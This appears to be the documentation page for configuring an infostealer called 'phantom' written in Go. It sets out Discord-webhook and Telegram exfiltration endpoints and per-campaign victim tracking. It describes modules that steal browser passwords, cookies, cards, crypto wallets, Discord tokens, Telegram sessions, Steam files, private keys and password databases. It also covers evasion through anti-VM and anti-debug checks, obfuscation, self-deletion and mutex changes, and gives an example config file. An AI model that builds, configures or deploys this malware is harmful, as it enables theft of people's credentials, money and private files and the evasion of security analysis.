Skip to main content

Overview

All configuration settings are defined in config/config.go. These values must be set before building the stealer binary.
Remember to use garble or similar obfuscation for sensitive values like webhook URLs to avoid static detection.

C2 Configuration

Configure your command and control endpoints for data exfiltration.
At least one C2 method (Discord or Telegram) must be configured or exfiltration will fail.
DiscordWebhook
string
default:"\"\""
Discord webhook URL - PRIMARY exfiltration method.Format: https://discord.com/api/webhooks/xxxxx/yyyyyThis is the preferred method for receiving stolen data as Discord webhooks are reliable and don’t require bot setup.
TelegramToken
string
default:"\"\""
Telegram bot token - BACKUP exfiltration method.Only used if Discord fails or isn’t set. Obtain from @BotFather on Telegram.
TelegramChatID
string
default:"\"\""
Telegram chat ID where data will be sent.Get this from @userinfobot on Telegram by sending /start.

Build Information

Identifiers for tracking and avoiding conflicts.
BuildID
string
default:"\"phantom-v1.0\""
Build identifier for tracking different campaigns.Change this for each campaign to track which victims came from which distribution method.
MutexName
string
default:"\"phantom_mtx_7f3a9b2c\""
Mutex name to prevent multiple instances running simultaneously.
Change this value to avoid detection by mutex scanners and security products that fingerprint known stealer mutexes.

Module Toggles

Enable or disable specific stealing modules. More modules = more data but also more suspicious behavior.

Data Collection Modules

StealBrowsers
bool
default:"true"
Extract passwords, cookies, credit cards, and browsing history from all supported browsers.Targets Chromium-based browsers (Chrome, Edge, Brave, Opera, etc.) and Firefox-based browsers.
StealCrypto
bool
default:"true"
Steal cryptocurrency wallets - both desktop applications and browser extensions.See Targets for the complete list of supported wallets.
StealDiscord
bool
default:"true"
Extract Discord authentication tokens from desktop clients and browser sessions.Tokens can be used to access accounts without passwords.
StealTelegram
bool
default:"true"
Steal Telegram tdata session files.These files contain session data that can be used to hijack Telegram accounts.
StealSteam
bool
default:"true"
Extract Steam ssfn and config files.These files can be used to bypass Steam Guard on other machines.
TakeScreenshot
bool
default:"true"
Capture a PNG screenshot of the victim’s desktop.Useful for understanding what the victim was doing and identifying additional attack vectors.
GrabSystemInfo
bool
default:"true"
Collect system information including hostname, IP address, hardware specs, and OS details.Provides context about the victim machine for further exploitation.

Danger Zone

These modules are noisier and more likely to trigger detection. Use with caution in production environments.
Persistence
bool
default:"false"
Add stealer to Windows registry and startup folder for persistence across reboots.
Disabled by default. This is very noisy and will trigger most security products.
SelfDestruct
bool
default:"false"
Delete the executable after successful execution.
Disabled by default. Helps avoid forensic analysis but may cause issues if exfiltration fails.

Anti-Analysis Features

Recommended to keep both enabled for production builds to evade sandbox and researcher analysis.
AntiVM
bool
default:"true"
Detect and exit if running in a virtual machine.Checks for VMware, VirtualBox, QEMU, Hyper-V, and other common virtualization platforms.
AntiDebug
bool
default:"true"
Detect and exit if a debugger is attached.Prevents dynamic analysis and reverse engineering attempts.

File Grabber Settings

The file grabber searches specific directories for interesting files based on extension filters.
FileGrabber
bool
default:"true"
Enable the file grabber module.Searches configured directories for files matching specified extensions.
FileExtensions
[]string
default:"See below"
List of file extensions to grab from target directories.Default extensions:
  • .txt - Text files
  • .doc - Word documents (legacy)
  • .docx - Word documents
  • .xls - Excel spreadsheets (legacy)
  • .xlsx - Excel spreadsheets
  • .pdf - PDF documents
  • .json - JSON configuration files
  • .csv - CSV data files
  • .db - Generic database files
  • .sqlite - SQLite databases
  • .key - Private key files
  • .pem - PEM certificates/keys
  • .ppk - PuTTY private keys
  • .kdbx - KeePass password databases
  • .rdp - Remote Desktop Protocol files
  • .ovpn - OpenVPN configurations
  • .conf - Generic config files
  • .wallet - Wallet data files
  • .dat - Bitcoin wallet.dat and similar
MaxFileSize
int64
default:"5242880"
Maximum file size in bytes (default: 5MB).Files larger than this will be skipped to avoid grabbing huge files that could slow down exfiltration.Formula: 5 * 1024 * 1024 = 5,242,880 bytes
GrabberPaths
[]string
Directories to search for files (relative to user home directory).Default paths:
  • Desktop - User desktop folder
  • Documents - User documents folder
  • Downloads - User downloads folder
These directories typically contain the most valuable data. Additional paths can be added but will increase execution time.

Runtime Configuration

These values are set at runtime and should not be modified manually.
The stealer uses a runtime XOR key derived from the victim’s hostname. This makes static analysis harder since the encryption key isn’t present in the binary. 
var xorKey []byte

func SetKey(key []byte) {
    xorKey = key
}

func GetKey() []byte {
    return xorKey
}

Example Configuration

package config

// C2 Configuration
var (
    DiscordWebhook = "https://discord.com/api/webhooks/123456/abcdef"
    TelegramToken  = ""
    TelegramChatID = ""
)

// Build Info
var (
    BuildID   = "campaign-january-2026"
    MutexName = "phantom_custom_mutex_a1b2c3d4"
)

// Module Toggles
var (
    StealBrowsers  = true
    StealCrypto    = true
    StealDiscord   = true
    StealTelegram  = true
    StealSteam     = true
    TakeScreenshot = true
    GrabSystemInfo = true
    
    Persistence  = false
    SelfDestruct = false
    
    AntiVM    = true
    AntiDebug = true
    
    FileGrabber = true
)

Build docs developers (and LLMs) love

Get started for freeTalk to us